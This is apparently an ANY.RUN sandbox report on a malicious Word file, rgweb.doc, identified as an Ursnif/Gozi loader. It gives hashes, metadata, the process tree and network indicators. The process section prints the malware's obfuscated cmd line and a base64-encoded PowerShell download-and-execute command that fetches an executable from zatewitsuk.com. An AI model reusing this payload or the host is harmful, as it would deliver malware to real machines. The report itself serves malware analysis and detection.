analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

rgweb.doc

Full analysis: https://app.any.run/tasks/f69d9ca4-0027-4881-85bf-e8b7844c2545
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 15, 2018, 10:38:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-close
generated-doc
gozi
ursnif
opendir
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Stand-alone regional adapter, Subject: North Carolina Gunner, Comments: Enterprise-wide next generation process improvement, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 25 22:21:00 2018, Last Saved Time/Date: Thu Nov 15 06:29:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

2C77215B0E28C19DA833437823563B31

SHA1:

22EF036F7994433D2CB35962598F992F0021B914

SHA256:

145B152CA80537A1961DB8FDA9AD6F55E75BB9621AC65DA955582AAA21851CFF

SSDEEP:

3072:MaOCTk6eNRb7QMZCrfYH2IOplVWBG6prjwPGo5:Maa9k1Lew3W0+4uQ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2772)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2772)
    • Executes PowerShell scripts

      • cMd.EXE (PID: 3952)
    • Application was dropped or rewritten from another process

      • 475ee4ff.exe (PID: 4024)
      • 475ee4ff.exe (PID: 2104)
    • URSNIF was detected

      • powershell.exe (PID: 2260)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2260)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2260)
    • Creates files in the user directory

      • powershell.exe (PID: 2260)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2772)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2772)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Stand-alone regional adapter
Subject: North Carolina Gunner
Author: -
Keywords: -
Comments: Enterprise-wide next generation process improvement
Template: Normal
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:04:25 21:21:00
ModifyDate: 2018:11:15 06:29:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Cyrillic
Manager: -
Company: -
Bytes: 123904
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • Stand-alone regional adapter
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
5
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs #URSNIF powershell.exe 475ee4ff.exe no specs 475ee4ff.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2772"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\rgweb.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3952cMd.EXE /c p^o^W^e^r^S^h^e^l^L^.^e^x^e^ ^-^e^c^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^6^A^G^E^A^d^A^B^l^A^H^c^A^a^Q^B^0^A^H^M^A^d^Q^B^r^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^Z^A^E^U^A^U^g^A^v^A^H^A^A^Z^Q^B^s^A^G^k^A^b^Q^A^u^A^H^A^A^a^A^B^w^A^D^8^A^b^A^A^9^A^H^U^A^b^A^B^v^A^G^Y^A^N^A^A^u^A^H^c^A^b^w^B^z^A^C^I^A^L^A^A^g^A^C^Q^A^Z^Q^B^u^A^H^Y^A^O^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^A^A^K^w^A^g^A^C^c^A^X^A^A^0^A^D^c^A^N^Q^B^l^A^G^U^A^N^A^B^m^A^G^Y^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^C^k^A^O^w^B^T^A^H^Q^A^Y^Q^B^y^A^H^Q^A^L^Q^B^Q^A^H^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^D^Q^A^N^w^A^1^A^G^U^A^Z^Q^A^0^A^G^Y^A^Z^g^A^u^A^G^U^A^e^A^B^l^A^C^c^A^O^w^A^g^A^E^U^A^e^A^B^p^A^H^Q^AC:\Windows\system32\cMd.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2260poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwB6AGEAdABlAHcAaQB0AHMAdQBrAC4AYwBvAG0ALwBZAEUAUgAvAHAAZQBsAGkAbQAuAHAAaABwAD8AbAA9AHUAbABvAGYANAAuAHcAbwBzACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAA0ADcANQBlAGUANABmAGYALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcADQANwA1AGUAZQA0AGYAZgAuAGUAeABlACcAOwAgAEUAeABpAHQAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cMd.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2104"C:\Users\admin\AppData\Roaming\475ee4ff.exe" C:\Users\admin\AppData\Roaming\475ee4ff.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
4024"C:\Users\admin\AppData\Roaming\475ee4ff.exe" C:\Users\admin\AppData\Roaming\475ee4ff.exe475ee4ff.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 292
Read events
1 163
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
2
Text files
2
Unknown types
3

Dropped files

PID
Process
Filename
Type
2772WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA5D0.tmp.cvr
MD5:
SHA256:
2772WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF760A3BDF79DD8580.TMP
MD5:
SHA256:
2772WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6AB743EE-532C-4517-8A71-7029BE4923F5}.tmp
MD5:
SHA256:
2772WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{CAA54EAD-998B-4756-B7ED-D942CF9C7D8B}.tmp
MD5:
SHA256:
2260powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MDRKR0PGFSE8FZUBMAY3.temp
MD5:
SHA256:
2772WINWORD.EXEC:\Users\admin\Desktop\~$rgweb.docpgc
MD5:CBFDEF000912FC91AB5EBCEA7DC09838
SHA256:B566A566C87B81747AB91125821E0EF04E6E0B199C3A358ACB543D53C7AB7F72
2772WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F12123BE3FC217E2B306FA7D3C1EF718
SHA256:3C767FE8FEA3E2CCF71ADDB57BE518569265124015C279DC07A0A438B8E20F32
2772WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:C55C44C704B5C20F6BEBF07CDC9DA875
SHA256:A9C903C4F4DE16F21DF37996C07B2451CDBF8BC84F3359EEEC89640F025D0BB1
2260powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5dce86.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
2260powershell.exeC:\Users\admin\AppData\Roaming\475ee4ff.exeexecutable
MD5:39A913B010F9FC831F64CD3FC832CFDD
SHA256:8DC0CF33B446D581488A26538C3906F6070BDFCA2FAB39D48201B259309704F8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2260
powershell.exe
GET
200
192.162.244.203:80
http://zatewitsuk.com/YER/pelim.php?l=ulof4.wos
RU
executable
142 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2260
powershell.exe
192.162.244.203:80
zatewitsuk.com
RU
suspicious

DNS requests

Domain
IP
Reputation
zatewitsuk.com
  • 192.162.244.203
suspicious

Threats

PID
Process
Class
Message
2260
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2260
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2260
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
1 ETPRO signatures available at the full report
No debug info